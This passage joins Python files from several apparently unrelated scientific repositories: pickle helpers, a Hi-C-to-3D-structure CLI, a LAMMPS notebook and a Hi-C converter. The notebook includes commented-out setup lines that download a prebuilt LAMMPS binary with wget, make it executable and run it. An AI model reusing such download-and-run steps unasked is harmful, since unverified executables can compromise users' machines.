else:
break
return method.__get__(obj, cls)
# Register instancemethod support
copy_reg.pickle(types.MethodType, pickle_method, unpickle_method)
```
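A small sketch of what the registration above enables: once the module is imported, bound methods can round-trip through pickle. The class here is purely illustrative.

```python
import pickle

from segue.backend import pickle_support  # noqa: F401  (importing registers the handler)


class Counter(object):
    '''Illustrative class; any picklable instance works.'''

    def __init__(self):
        self.value = 0

    def increment(self):
        self.value += 1
        return self.value


counter = Counter()
restored = pickle.loads(pickle.dumps(counter.increment))
print(restored())  # 1
```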
#### File: backend/processor/background.py
```python
import subprocess
import pickle
import base64
try:
from shlex import quote
except ImportError:
from pipes import quote
from .base import Processor
from .. import pickle_support
class BackgroundProcessor(Processor):
'''Local background processor.'''
def process(self, command, args=None, kw=None):
'''Process *command* with *args* and *kw*.'''
if args is None:
args = ()
if kw is None:
kw = {}
serialised = base64.b64encode(
pickle.dumps(
{'command': command, 'args': args, 'kw': kw},
pickle.HIGHEST_PROTOCOL
)
)
python_statement = (
'import pickle;'
'import base64;'
'data = base64.b64decode(\'{0}\');'
'data = pickle.loads(data);'
'data[\'command\'](*data[\'args\'], **data[\'kw\'])'
).format(serialised.replace("'", r"\'"))
command = []
if self.host is None:
command.append('python')
else:
command.extend(self.host.get_python_prefix())
command.extend(['-c', python_statement])
print(command)
process = subprocess.Popen(command)
return 'Background process started: {0}'.format(process.pid)
``` |
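The heart of `BackgroundProcessor.process` is the base64/pickle payload it hands to `python -c`; this minimal sketch replays that round trip in-process with a hypothetical function so the mechanism is easy to follow.

```python
import base64
import pickle


def announce(name):
    '''Hypothetical stand-in for the command being dispatched.'''
    return 'started: {0}'.format(name)


payload = base64.b64encode(
    pickle.dumps({'command': announce, 'args': ('render',), 'kw': {}},
                 pickle.HIGHEST_PROTOCOL)
)

data = pickle.loads(base64.b64decode(payload))
print(data['command'](*data['args'], **data['kw']))  # started: render
```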
{
"source": "4DGB/3DStructure",
"score": 2
} |
#### File: 3DStructure/hic2structure/__main__.py
```python
import argparse
from pathlib import Path
import sys
from .types import Settings
from .hic import HIC, HICError
from .lammps import LAMMPSError, run_lammps
from .contacts import contact_records_to_set
from .out import write_structure
########################
# GLOBALS
########################
verbose=False
########################
# HELPER FUNCTIONS
########################
def settings_from_args(args: argparse.Namespace) -> Settings:
return {
'chromosome': args.chromosome,
'resolution': args.resolution,
'count_threshold': args.count,
'distance_threshold': 0, # Unused in the main script
'bond_coeff': args.bond_coeff,
'timesteps': args.timesteps
}
def log_info(message):
'''
Log a message to stderr (if verbose is True)
'''
if not verbose:
return
print(
f"\033[1m[\033[94m>\033[0m\033[1m]:\033[0m {message}",
file=sys.stderr, flush=True
)
def log_error(message):
'''
Log an error message to stderr
'''
prefix = "\033[1m[\033[31mERROR\033[0m\033[1m]:\033[0m" \
if verbose else "error:"
print(f"{prefix} {message}")
########################
# PARSE ARGUMENTS
########################
parser = argparse.ArgumentParser(
prog="python3 -m hic2structure",
description="hic2structure: Uses LAMMPS to generate structures from Hi-C data."
)
parser.add_argument(
"--resolution",
type=int, default=200000, metavar="NUM", dest="resolution",
help="Bin resolution. (Defaults to 200000)"
)
parser.add_argument(
"--count-threshold",
type=float, default=2.0, metavar="NUM", dest="count",
help="Threshold for reading contacts from Hi-C file. "\
"Records with a count lower than this are exluced. (Defaults to 2.0)"
)
parser.add_argument(
"-o", "--output",
type=str, default="./out", metavar="PATH", dest="output",
help="Output directory. (Defaults to './out')"
)
parser.add_argument(
"--lammps",
type=str, default="lmp", metavar="NAME", dest="lammps",
help="Name of LAMMPS executable to use. (Defaults to 'lmp')"
)
parser.add_argument(
"--chromosome",
type=str, default="X", metavar="NAME", dest="chromosome",
help="Chromosome to use. (Defaults to 'X')"
)
parser.add_argument(
"--bond-coeff",
type=int, default=55, metavar="NUM", dest="bond_coeff",
help="FENE bond coefficient. This affects the maximum allowed length of"\
" bonds in the LAMMPS simulation. If LAMMPS gives errors about bad"\
" bad FENE bonds, try increasing this value. (Defaults to 55)"
)
parser.add_argument(
"--timesteps",
type=int, default=1000000, metavar="NUM", dest="timesteps",
help="Number of timesteps to run in LAMMPS"
)
parser.add_argument(
"-v", "--verbose",
help="Enable verbose output",
action="store_true", default=False
)
parser.add_argument(
"file",
help="Input .hic file", type=str
)
args = parser.parse_args()
verbose = args.verbose
outdir = Path(args.output)
settings = settings_from_args(args)
########################
# MAIN
########################
try:
hic = HIC( Path(args.file) )
inputs = contact_records_to_set( hic.get_contact_records(settings) )
log_info(f"Loaded \033[1m{len(inputs)}\033[0m contact records from Hi-C file.")
except HICError as e:
log_error(f"Error reading contact records: {e}")
exit(1)
outdir.mkdir(parents=True, exist_ok=True)
try:
log_info(f"Running LAMMPS (this might take a while)...")
lammps_data = run_lammps(inputs, settings, args.lammps, copy_log_to=outdir/'sim.log')
log_info(f"LAMMPS finished.")
except LAMMPSError as e:
log_error(e)
exit(1)
last_timestep = lammps_data[ sorted(lammps_data.keys())[-1] ]
structure_path = outdir/'structure.csv'
write_structure( structure_path, last_timestep )
log_info(f"Saved structure data to \033[1m{structure_path}\033[0m.")
```
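The same pipeline can be driven from Python; this sketch mirrors the calls the CLI above makes. The input path and output locations are hypothetical, and a plain dict stands in for the `Settings` type.

```python
from pathlib import Path

from hic2structure.hic import HIC
from hic2structure.contacts import contact_records_to_set
from hic2structure.lammps import run_lammps
from hic2structure.out import write_structure

settings = {
    'chromosome': 'X', 'resolution': 200000, 'count_threshold': 2.0,
    'distance_threshold': 0, 'bond_coeff': 55, 'timesteps': 1000000,
}

hic = HIC(Path('data/example.hic'))                      # hypothetical input
contacts = contact_records_to_set(hic.get_contact_records(settings))
frames = run_lammps(contacts, settings, 'lmp', copy_log_to=Path('out/sim.log'))
write_structure(Path('out/structure.csv'), frames[sorted(frames.keys())[-1]])
```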
#### File: 3DStructure/original_notebook/hicstraw.py
```python
import numpy as np
import plotly.graph_objs as go
from plotly.offline import iplot
"""
Straw module
Straw enables programmatic access to .hic files.
.hic files store the contact matrices from Hi-C experiments and the
normalization and expected vectors, along with meta-data in the header.
Usage: strawObj = straw <hicFile(s)>
matrixObj = strawObj.getNormalizedMatrix <chr1> <chr2> <NONE/VC/VC_SQRT/KR> <BP/FRAG> <binsize>
data = matrixObj.getDataFromBinRegion <x1,x2,y1,y2>
Example:
import straw
strawObj = straw(filename)
matrixObj = strawObj.getNormalizedMatrix('5', '5', 'KR', 'BP', 5000)
result = matrixObj.getDataFromBinRegion(0,500,0,500)
for i in range(len(result[0])):
... print("{0}\t{1}\t{2}".format(result[0][i], result[1][i], result[2][i]))
See https://github.com/theaidenlab/straw/wiki/Python for more documentation
"""
from __future__ import absolute_import, division, print_function, unicode_literals
__author__ = "<NAME>, <NAME>, <NAME>, <NAME>, <NAME>"
__license__ = "MIT"
import struct
import sys
import zlib
import requests
import io
import concurrent.futures
import math
def __readcstr(f):
""" Helper function for reading in C-style string from file
"""
buf = b""
while True:
b = f.read(1)
if b is None or b == b"\0":
return buf.decode("utf-8")
elif b == "":
raise EOFError("Buffer unexpectedly empty while trying to read null-terminated string")
else:
buf += b
"""
functions for chrom.sizes
internal representation is a dictionary with
chromosome name as the key
value maps to a tuple containing the index and chromosome length
"""
class ChromDotSizes:
def __init__(self, data):
self.data = data
def getLength(self, chrom):
try:
return int(self.data[chrom][1])
except:
raise ValueError(str(chrom) + " not in chrom.sizes. Check that the chromosome name matches the genome.\n")
def getIndex(self, chrom):
try:
return int(self.data[chrom][0])
except:
raise ValueError(str(chrom) + " not in chrom.sizes. Check that the chromosome name matches the genome.\n")
def figureOutEndpoints(self, chrAndPositions):
chrAndPositionsArray = chrAndPositions.split(":")
chrom = chrAndPositionsArray[0]
indx1 = 0
indx2 = self.getLength(chrom)
if len(chrAndPositionsArray) == 3:
indx1 = int(chrAndPositionsArray[1])
indx2 = int(chrAndPositionsArray[2])
return chrom, indx1, indx2
def read_metadata(infile,verbose=False):
"""
Reads the metadata of HiC file from header.
Args
infile: str, path to the HiC file
verbose: bool
Returns
metadata: dict, containing the metadata.
Keys of the metadata:
HiC version,
Master index,
Genome ID (str),
Attribute dictionary (dict),
Chromosomes (dict),
Base pair-delimited resolutions (list),
Fragment-delimited resolutions (list).
"""
metadata={}
import io
import struct
if (infile.startswith("http")):
# try URL first. 100K should be sufficient for header
headers={'range' : 'bytes=0-100000', 'x-amz-meta-requester' : 'straw'}
s = requests.Session()
r=s.get(infile, headers=headers)
if (r.status_code >=400):
print("Error accessing " + infile)
print("HTTP status code " + str(r.status_code))
sys.exit(1)
req=io.BytesIO(r.content)
myrange=r.headers['content-range'].split('/')
totalbytes=myrange[1]
else:
req=open(infile, 'rb')
magic_string = struct.unpack('<3s', req.read(3))[0]
req.read(1)
if (magic_string != b"HIC"):
sys.exit('This does not appear to be a HiC file; magic string is incorrect')
version = struct.unpack('<i',req.read(4))[0]
metadata['HiC version']=version
masterindex = struct.unpack('<q',req.read(8))[0]
metadata['Master index']=masterindex
genome = ""
c=req.read(1).decode("utf-8")
while (c != '\0'):
genome += c
c=req.read(1).decode("utf-8")
metadata['Genome ID']=genome
if (version > 8):
nvi = struct.unpack('<q',req.read(8))[0]
nvisize = struct.unpack('<q',req.read(8))[0]
metadata['NVI'] = nvi
metadata['NVI size'] = nvisize
## read and throw away attribute dictionary (stats+graphs)
nattributes = struct.unpack('<i',req.read(4))[0]
d={}
for x in range(0, nattributes):
key = __readcstr(req)
value = __readcstr(req)
d[key]=value
metadata['Attribute dictionary']=d
nChrs = struct.unpack('<i',req.read(4))[0]
d={}
for x in range(0, nChrs):
key = __readcstr(req)
if (version > 8):
value = struct.unpack('q',req.read(8))[0]
else:
value = struct.unpack('<i',req.read(4))[0]
d[key]=value
metadata["Chromosomes"]=d
nBpRes = struct.unpack('<i',req.read(4))[0]
l=[]
for x in range(0, nBpRes):
res = struct.unpack('<i',req.read(4))[0]
l.append(res)
metadata["Base pair-delimited resolutions"]=l
nFrag = struct.unpack('<i',req.read(4))[0]
l=[]
for x in range(0, nFrag):
res = struct.unpack('<i',req.read(4))[0]
l.append(res)
metadata["Fragment-delimited resolutions"]=l
for k in metadata:
if k!='Attribute dictionary':
print(k,':',metadata[k])
if verbose:
print('Attribute dictionary',':',metadata['Attribute dictionary'])
return metadata
# Downloads Hi-C file
#!wget -cq https://www.dropbox.com/s/t3d3kmoerm54dlr/GSM1551620_HIC071.hic
# Define files and HiC read settings
path = '/content/'
hicname = 'GSM1551620_HIC071.hic'
hic_metadata = read_metadata(hicname)
chromosomes = list(hic_metadata["Chromosomes"].keys())
base_resolutions = hic_metadata["Base pair-delimited resolutions"]
fragment_resolutions = hic_metadata["Fragment-delimited resolutions"]
"""# 2. Hi-C Data Processing"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# !pip install hic-straw
# import straw
# Saves all self-contact data in Hi-C file
def self_chromosome_interactions(chromosomes, hicname, res):
genome = {}
for i in chromosomes:
# Adds chromosome interaction to genome dictionary,
# interactions stored as list of contactRecord objects
try:
genome[i] = straw.straw('observed','KR', hicname, i, i, 'BP', res)
except:
print(f"Interaction data for chromosome {i} not found")
return genome
# Converts chromosome interactions from contactRecords into a list
def contactRecords_to_list(records):
table = np.zeros((len(records), 3))
index = 0
for contact in records:
table[index][0] = int(contact.binX)
table[index][1] = int(contact.binY)
table[index][2] = contact.counts
index += 1
return table
# Converts data in resolution units into particle numbers
def res_correct(table, res):
table[:, 0] //= res
table[:, 1] //= res
table[:, 0] += 1
table[:, 1] += 1
return table
# Keeps entries where contact counts are higher than user-given threshold
# and gets rid of atom self contacts
def lammps_correct(table, threshold):
table = table[table[:,2] > threshold]
table = table[table[:,0] != table[:,1]]
return table
res = 250000
threshold = 3.3
#genome = self_chromosome_interactions(chromosomes, hicname, res)
genome = {}
for i in chromosomes:
# Adds chromosome interaction to genome dictionary,
# interactions stored as list of contactRecord objects
try:
genome[i] = straw.straw('observed','KR', hicname, i, i, 'BP', res)
except:
print(f"Interaction data for chromosome {i} not found")
x_correct = lammps_correct(res_correct(contactRecords_to_list(genome["X"]), res), threshold)
"""# 3. LAMMPS Input & Data File Construction"""
import time
# function to plot 3D structure
def plot_3D(coords):
x = np.zeros(len(coords))
y = np.zeros(len(coords))
z = np.zeros(len(coords))
for i in range(len(coords)):
x[i] = coords[i][0]
y[i] = coords[i][1]
z[i] = coords[i][2]
trace = go.Scatter3d(
x = x, y = y, z = z, mode = 'lines+markers', marker = dict(
size = 5,
colorscale = 'Viridis'
)
)
layout = go.Layout(title = f'Initial Random Structure')
fig = go.Figure(data = [trace], layout = layout)
iplot(fig)
return None
# function to check if next site is already occupied
def check_if_free(lattice_coords, next_coords, index):
for i in range(index):
if lattice_coords[i][0] == next_coords[0] and lattice_coords[i][1] == next_coords[1] \
and lattice_coords[i][2] == next_coords[2]:
return False
return True
# function to create random 3D walk on lattice
def random_walk(n):
backtrack = 10
lattice_coords = np.zeros([n, 3])
steps = np.array([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0],
[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]])
i = 1
while i < n:
issue = False
s = time.time()
#if i % 100 == 0:
#print(i, s-start, 's')
rand = np.random.randint(0, 6)
next_coords = lattice_coords[i - 1] + steps[rand]
while check_if_free(lattice_coords, next_coords, i) == False:
rand = np.random.randint(0, 6)
next_coords = lattice_coords[i-1] + steps[rand]
e = time.time()
if e - s > 0.1:
issue = True
#print('Stuck! Go back and find a new way... %s' % i)
for k in range(1, backtrack + 1):
lattice_coords[i-k] = np.zeros(3)
i -= backtrack + 1
break
if issue == False:
lattice_coords[i] = next_coords
i += 1
return lattice_coords
# function to create molecule tags
def create_molecule_tags(n, lengths):
tags = []
tag = 1
cumlength = np.cumsum(lengths)
for i in range(1, n+1):
if i - 1 in cumlength:
tag += 1
tags.append(tag)
return tags
# function to create bonds
def create_bonds(n, lengths):
bonds = []
cumlength = np.cumsum(lengths)
for i in range(1, n):
if i not in cumlength:
bonds.append([i, i+1])
return bonds
# function to create angles
def create_angles(n, lengths):
angles = []
cumlength = np.cumsum(lengths)
for i in range(1, n-1):
if (i not in cumlength) and (i+1 not in cumlength):
angles.append([i, i + 1, i + 2])
return angles
# function to create data file
def create_datafile(n, lengths, spacing, lattice_numbers, dimensions):
chains = int(len(lengths)) # number of chains
bond_number = int(sum(lengths) - chains) # number of bonds
angle_number = 0
for length in lengths:
if length > 2.0:
angle_number += int(length - 2) # number of bond angles
lattice_coords = random_walk(n) * spacing # coordinates of lattice points
tags = create_molecule_tags(n, lengths) # molecule tags
bonds = create_bonds(n, lengths) # indicates bonds between particles
angles = create_angles(n, lengths) # indicates angles between particles
# open datafile to write to
datafile = open(f'random_coil_N{n}.dat', 'w')
datafile.write(f'LAMMPS data file for random 3D walk on lattice: N = {n}, Chain length = {length}\n\n')
datafile.write(f'{n} atoms\n1 atom types\n{bond_number} bonds\n2 bond types\n1000 extra bond per atom\n{angle_number} angles\n1 angle types\n\n')
datafile.write(f'{-dimensions[0] / 2} {dimensions[0] / 2} xlo xhi\n{-dimensions[1] / 2} {dimensions[1] / 2} ylo yhi\n{-dimensions[2] / 2} {dimensions[2] / 2} zlo zhi\n\n')
datafile.write('Masses\n\n1 1\n\nAtoms\n')
for i in range(n):
datafile.write(f'\n{i + 1}\t{tags[i]}\t1\t{lattice_coords[i][0]}\t{lattice_coords[i][1]}\t{lattice_coords[i][2]}\t0\t0\t0')
if bond_number > 0:
datafile.write('\n\nBonds\n')
for i in range(len(bonds)):
datafile.write(f'\n{i + 1}\t1\t{bonds[i][0]}\t{bonds[i][1]}')
if angle_number > 0:
datafile.write('\n\nAngles\n')
for i in range(len(angles)):
datafile.write(f'\n{i + 1}\t1\t{angles[i][0]}\t{angles[i][1]}\t{angles[i][2]}')
datafile.close()
plot_3D(lattice_coords)
return None
# function to create input file
def create_inputfile(n, timesteps, bondconnect):
# opens input file to write to
datafile = open('in.input', 'w')
dataname = f'random_coil_N{n}.dat' # data file name
lang = np.random.randint(1,1000000) # generates noise term for langevin
datafile.write('log sim.log\nunits lj\n\n')
datafile.write('atom_style angle\nboundary p p p\n\n')
datafile.write('neighbor 4 bin\nneigh_modify every 1 delay 1 check yes\n\n')
datafile.write('atom_modify sort 0 0\n\n')
datafile.write(f'#restart 1000000 N{n}.restart\n\n')
datafile.write(f'read_data {dataname}\n')
datafile.write('reset_timestep 0\n\n')
datafile.write(f'write_data equilibrated_N{n}.dat\n\n')
datafile.write('group all type 1\n\n')
datafile.write('dump 1 all custom 1000 sim.dump id x y z ix iy iz\n')
datafile.write('dump_modify 1 format line "%d %.5f %.5f %.5f %d %d %d"\n\n')
datafile.write('angle_style cosine\nangle_coeff 1 0.0\n\n')
datafile.write('pair_style lj/cut 1.12246152962189\n')
datafile.write('pair_modify shift yes\n')
datafile.write('pair_coeff * * 1.0 1.0\n\n')
datafile.write('bond_style hybrid harmonic fene\n')
datafile.write('bond_coeff 1 fene 30.0 10 1.0 1.0\n')
datafile.write('bond_coeff 2 harmonic 1.0 2.2\n')
datafile.write('special_bonds fene\n\n')
datafile.write('fix 1 all nve\n')
datafile.write(f'fix 2 all langevin 1.0 1.0 1.0 {lang}\n\n')
datafile.write('thermo 50000\n\n')
for i in range(len(bondconnect)):
datafile.write(f'create_bonds single/bond 2 {int(bondconnect[i][0])} {int(bondconnect[i][1])} special yes\n')
datafile.write('thermo_style custom step temp etotal epair emol press pxx pyy pzz lx ly lz pe ke ebond evdwl\n\n')
datafile.write('timestep 0.00001\n')
datafile.write(f'run {timesteps}')
# Defining LAMMPS properties
n = int(max(x_correct.max(axis = 0)[0], x_correct.max(axis = 0)[1])) # total number of particles
lengths = [n] # length of chains
spacing = 3.0 # lattice spacing
lattice_numbers = np.array([200, 200, 200])
dimensions = lattice_numbers * 2 # dimensions of box
timesteps = 1000000
# Creating input and data files for simulation
start = time.time()
create_datafile(n, lengths, spacing, lattice_numbers, dimensions)
create_inputfile(n, timesteps, x_correct)
end = time.time()
"""# 4. LAMMPS Simulation"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# # Creates LAMMPS executable
# !wget https://github.com/lmhale99/atomman-demo/raw/main/lmp.gz
# !gunzip lmp.gz
# !chmod 755 lmp
#
# import subprocess
# import shlex
# Runs LAMMPS simulation based on input file
def run_lammps(infile):
command = shlex.split(f'./lmp -in {infile}')
subprocess.run(command, check=True, capture_output=False, text=True)
# Reads dump file and extracts coordinate data
def readdump(file):
f = open(file).read().splitlines()
dump = {}
#finds coordinates using "ITEM:"
#creates a dictionary with timestep and coordinates
i = 0
while i < len(f):
timestep = int(f[f.index("ITEM: TIMESTEP", i) + 1].strip())
begind = f.index("ITEM: ATOMS id x y z ix iy iz", i)
try:
endind = f.index("ITEM: TIMESTEP", i+1)
except ValueError:
endind = len(f)
coords = f[begind + 1:endind]
data = np.zeros((len(coords), 7))
index = 0
for j in coords:
line = j.split()
data[index][0] = int(line[0])
data[index][1] = float(line[1])
data[index][2] = float(line[2])
data[index][3] = float(line[3])
data[index][4] = float(line[4])
data[index][5] = float(line[5])
data[index][6] = float(line[6])
index += 1
dump[timestep] = data
i = endind
return dump
# Displays simulation at timestep
def dumpplot(dump, timestep):
trace = go.Scatter3d(
x = dump[timestep][:,1], y = dump[timestep][:,2], z = dump[timestep][:,3], mode = 'lines+markers', marker = dict(
size = 5,
color = dump[timestep][:,0],
colorscale = 'Viridis'
)
)
layout = go.Layout(title = f'Simulation at timestep {timestep}')
fig = go.Figure(data = [trace], layout = layout)
iplot(fig)
run_lammps("in.input")
dump = readdump("sim.dump")
dumpplot(dump, 100000)
"""# 5. Analysis"""
#!wget -cq https://www.dropbox.com/s/nkbuklgq2c9ewvw/nWTXa
from scipy.stats import pearsonr
from scipy.spatial.distance import pdist, squareform
#Finds all contacts
def find_contacts(data, timestep, dist):
coords = data[timestep][:,1:4]
IDs = data[timestep][:,0]
distances = np.triu(squareform(pdist(coords)))
contact_IDarrays = np.where((distances<dist) & (distances>0))
C = np.ma.size(contact_IDarrays[0])
contact_IDs = np.hstack((np.reshape(np.take(IDs,contact_IDarrays[0]), (C,1)), np.reshape(np.take(IDs,contact_IDarrays[1]), (C,1))))
contacts = np.hstack((np.reshape(contact_IDs[:,0], (C,1)), np.reshape(contact_IDs[:,1], (C,1)), distances[np.reshape(contact_IDarrays[0], (C,1)), np.reshape(contact_IDarrays[1], (C,1))]))
return contacts
def find_nwtxa_contacts(file, dist):
rawdata = open(file).read().splitlines()
table = np.zeros((len(rawdata), 3))
index = 0
for i in rawdata:
line = i.split()
if(float(line[0]) > float(line[1]) and line[2] != 'NA' and float(line[2]) > dist):
table[index][0] = int(line[0])
table[index][1] = int(line[1])
table[index][2] = float(line[2])
index += 1
return table[0:index]
def plotcontactmap(contacts):
fig = go.Figure(data=[go.Scatter(
x = contacts[:,0],
y = contacts[:,1],
mode = 'markers',
marker=dict(
opacity=0.9,
color='Black',
size=1,
))
])
fig.update_layout(
width = 600,
height = 600,
title = "Contact Map"
)
fig.update_yaxes(
scaleanchor = "x",
scaleratio = 1,
)
fig.show()
def combine(mapone, maptwo):
onemax = int(max(mapone.max(axis = 0)[0], mapone.max(axis = 0)[1]))
twomax = int(max(maptwo.max(axis = 0)[0], maptwo.max(axis = 0)[1]))
maptwo[:, 0] *= onemax/twomax
maptwo[:, 1] *= onemax/twomax
combined = np.vstack((mapone, maptwo))
return combined
contacts = find_contacts(dump, 100000, 3.3)
nwtxa = find_nwtxa_contacts("nWTXa", 5)
combined = combine(nwtxa, contacts)
plotcontactmap(combined)
``` |
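To make the bin-to-particle conversion above concrete, here is a tiny worked example; it assumes `res_correct` and `lammps_correct` from the notebook cell above are in scope.

```python
import numpy as np

res = 250000
table = np.array([
    [0.0,      500000.0, 5.0],   # contact between bins 0 and 500000
    [250000.0, 250000.0, 9.0],   # self contact -> dropped
    [500000.0, 750000.0, 1.0],   # below threshold -> dropped
])

filtered = lammps_correct(res_correct(table.copy(), res), 3.3)
print(filtered)  # [[1. 3. 5.]] : particles 1 and 3 with a count of 5.0
```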
{
"source": "4DGB/hic-converter",
"score": 3
} |
#### File: hic-converter/scripts/h5.to.short.py
```python
import sys
# In[ ]:
## Set user defined variables
## Check we have three inputs!
assert (len(sys.argv) >= 4), "ERROR: This script must include:\n(1) The full path to a ginteractions (tsv) file (which is assumed to be an h5 matrix converted via HicExplorer).\n(2) A genome size (tsv) file with chromosome and size columns.\n(3) A valid output path to save the hic short file."
## Gather data inputs
datapath = str(sys.argv[1])
sizepath = str(sys.argv[2])
savepath = str(sys.argv[3])
## Set verbosity if passed
if (len(sys.argv) == 5):
if str(sys.argv[4]) == 'true':
verbose = True
else:
verbose = False
else:
verbose = False
# ## Set user defined variables
# ## Set input path
# datapath = '/Users/croth/HIC/MRC5/2401.006.h5.toremove.ginteractions.tsv'
#
# ## Set output path
# savepath = '/Users/croth/HIC/MRC5/2401.006.h5.toremove.short'
#
# ## Set path to size file
# sizepath = '/Users/croth/REFERENCES/ENCODE/genome.size.txt'
# #sizepath = '/Users/croth/REFERENCES/ENCODE/test1.size.txt'
# #sizepath = '/Users/croth/REFERENCES/ENCODE/test2.size.txt'
#
# ## Set verbose
# verbose = False
# In[ ]:
## Set other needed variables
## Set verbosity
#verbose = True
## Set input sep
mysep = '\t'
## Set output output sep
outsep = ' '
## Set column names
colname = ['Chrom1','Left1','Right1','Chrom2','Left2','Right2','Quality']
# In[ ]:
## Bring in needed mods
import pandas as pd, numpy as np
## Write a ftn to check index between two dataframes
def checkix(x,y):
x = np.array(sorted(x.index.values))
y = np.array(sorted(y.index.values))
assert (np.sum(x-y) == 0), "ERROR: The indices of the dataframes do not match!"
# In[ ]:
## Load in genomesize and contact data
## Log if verbose
if verbose:
print("Loading genome size and contact (h5) files.")
## Load genome size file
genomesize = pd.read_csv(sizepath,sep=mysep,names=['Chrom','Size'])
## Make a list of chromosomes
chrlist = genomesize.Chrom.tolist()
# In[ ]:
## Load in and set columns
temp = pd.read_csv(datapath,sep=mysep,header=None,names=colname)
## Take total contact counts
contacts = temp.shape[0]
## Print size of temp file
if verbose:
print('Detected %s HiC contacts.'%contacts)
if (contacts == 0):
print('ERROR: No HiC contacts detected!')
sys.exit(1)
# In[ ]:
## Subset data for data in genomesizes file
temp = temp[(temp[colname[0]].isin(chrlist)) &
(temp[colname[3]].isin(chrlist))].reset_index(drop=True)
## Gather the new index after dropping samples
theindex = temp.index.values
## Number of contacts dropped
ndrop = contacts - temp.shape[0]
## Calculate total number of contacts dropped
nperc = np.round(100*ndrop/contacts,3)
## Print the number of dropped contacts
if verbose:
print("WARNING: Removed %s ( %s"%(ndrop,nperc) + " % ) contacts from unlisted chromosomes." )
# In[ ]:
## Check that we have contacts for all chromosomes in chrlist
## Gather chromosomes still in the filtered h5
tempchrlist = list(np.unique(np.concatenate([temp[colname[0]].unique(),temp[colname[3]].unique()])))
## Gather the names of the missing chromosomes
missing = [c for c in chrlist if c not in tempchrlist]
## If any chromosomes are missing
if len(missing) > 0:
print("WARNING: No contacts were detected for chromosomes:")
print("\n".join(missing))
# In[ ]:
## Split by contact type
## Log if verbose
if verbose:
print("Splitting inter- & intra-chromosomal contacts.")
## Gather the between chrom contacts
inter = temp[(temp.Chrom1!=temp.Chrom2)]
## Check the shape and number of inter-chromosome contacts
if verbose and (inter.shape[0] == 0):
print("WARNING: Zero inter-chromosomal contacts detected.")
else:
print("Number of between chromosome contacts: %s"%inter.shape[0])
## Gather the within chromosome contacts
intra = temp[(temp.Chrom1==temp.Chrom2)]
## Check the shape and number of intra-chromosome contacts
if verbose and (intra.shape[0] == 0):
print("ERROR: Zero intra-chromosomal contacts detected.")
sys.exit(1)
else:
print("Number of within chromosome contacts: %s"%intra.shape[0])
## What is the ratio of intra vs inter
if verbose and (intra.shape[0] > 0):
## Calculate ratio
interintra = np.round(100*inter.shape[0]/intra.shape[0],3)
## Print to screen
print('Ratio of inter- to intra-chromosome contacts: %s %s'%(interintra,'%'))
# In[ ]:
## Correct intra chromosomal contacts
## Remove temp
del temp
## Log if verbose
if verbose:
print("Sorting intra-chromosomal contacts.")
## Sort the within chromosome contacts by chromosome and left read position
intrac = pd.concat([intra[(intra.Chrom1==c)].sort_values('Left1') for c in chrlist])
## Delete the old intra
del intra
# In[ ]:
## Split inter chromosome contacts into left and right pairs
## Log status
if verbose and (inter.shape[0]>0):
print("Gathering pairs of inter-chromosomal contacts.")
## Gather left
left = inter[inter.columns[:3]]
## Check work
assert (left.shape[1] == 3), "ERROR: Missing columns of left pairs.\nThere should be three and there are %s"%left.shape[1]
## Gather right
righ = inter[inter.columns[3:-1]]
## Check work
assert (righ.shape[1] == 3), "ERROR: Missing columns of right pairs.\nThere should be three and there are %s"%righ.shape[1]
## Take the correction index
tocorrect = inter.index.values
## Take the quality of between chromosome contacts
interquality = inter[colname[-1]]
# In[ ]:
## Reorder pairs of inter chromosomal contacts
if verbose and (inter.shape[0]>0):
print("Reordering inter-chromosomal contacts by chromosome.")
## Initialize inter list
inter = []
## Iteratively correct the inter chromosome names
for i in tocorrect:
## Gather chromosome names from
## The left pair and ..
c1 = left.loc[i,colname[0]]
## the right pair of the inter chromosome contact
c2 = righ.loc[i,colname[3]]
## Gather chromosome index of the left read and ..
c1ix = genomesize[(genomesize.Chrom==c1)].index.min()
## the right read of the pair in contact
c2ix = genomesize[(genomesize.Chrom==c2)].index.min()
## If the "Left" chromosome is the first in order make in this order
if (c1ix < c2ix):
newline = left.loc[i].tolist() + righ.loc[i].tolist()
## Else if "right" chromosome is the first in order make in this order
else:
newline = righ.loc[i].tolist() + left.loc[i].tolist()
## assert that the chromosomes may not have the same index
assert (c1ix != c2ix), "ERROR: The chromosomes are not inter-chromosomal contacts! "
## append to inter list
inter.append(newline)
## Make list into dataframe
inter = pd.DataFrame(inter,columns=colname[:-1],index=tocorrect)
## Check that we have the same size dataframe
assert (inter.shape[0] == left.shape[0])
# In[ ]:
## Sort inter pairs by chromosome positon
if verbose and (inter.shape[0]>0):
print("Sorting inter-chromosomal contacts by chromosome.")
## Initialize corrected inter (between) chrom contact list
interc = []
## Gather list of chromosomes with trans contacts
interchrs = [c for c in chrlist if c in inter[colname[0]].tolist()]
for c in interchrs:
## Slice the single chromosome
temp = inter[(inter.Chrom1==c)]
## Gather the inter chromosomes
interchrom = genomesize[(genomesize.Chrom.isin(temp[colname[3]].unique()))].Chrom.tolist()
## Sort the right side of the interchromosomes
tempc = pd.concat([temp[(temp[colname[3]]==ic)].sort_values([colname[1],colname[4]]) for ic in interchrom])
## append to the corrected between chromosome contact list
interc.append(tempc)
## Concatenate into a dataframe
if (len(interc)>0):
interc = pd.concat(interc)
## Check our work
assert (inter.shape[0] == interc.shape[0])
## Check the index
checkix(inter,interc)
## Delete memory hogs
del tempc
else:
## Set interc to the empty dataframe made above
interc = inter
## Check work
assert (interc.shape[0] == 0)
# In[ ]:
## Combine both sorted inter and intra by sorted chromosome in chrlist
if verbose:
print("Blocking contacts of %s chromosome(s)."%len(chrlist))
## Initialize list
hic = []
## Set counter
ci = 0
## Iterate thru each chromosome
for c in chrlist:
## Slice intra (within)
temp1 = intrac[(intrac[colname[0]]==c)]
## Slice inter (between)
temp2 = interc[(interc[colname[0]]==c)]
## Print a warning if both intra and inter chrom contacts are zero!
if (temp1.shape[0]==0) and (temp2.shape[0]==0):
print('WARNING: No contacts found for %s'%c)
continue
## If there are no between chrom contacts
if (temp2.shape[0]==0):
## Set new temp to just the within chrom contacts
temp = temp1
## Otherwise concatenate them
else:
temp = pd.concat([temp1,temp2])
## append to list
hic.append(temp)
## Count
ci += 1
## Check our count
assert ci == len(chrlist)
## make into a dataframe
hic = pd.concat(hic)
## Check the final shape
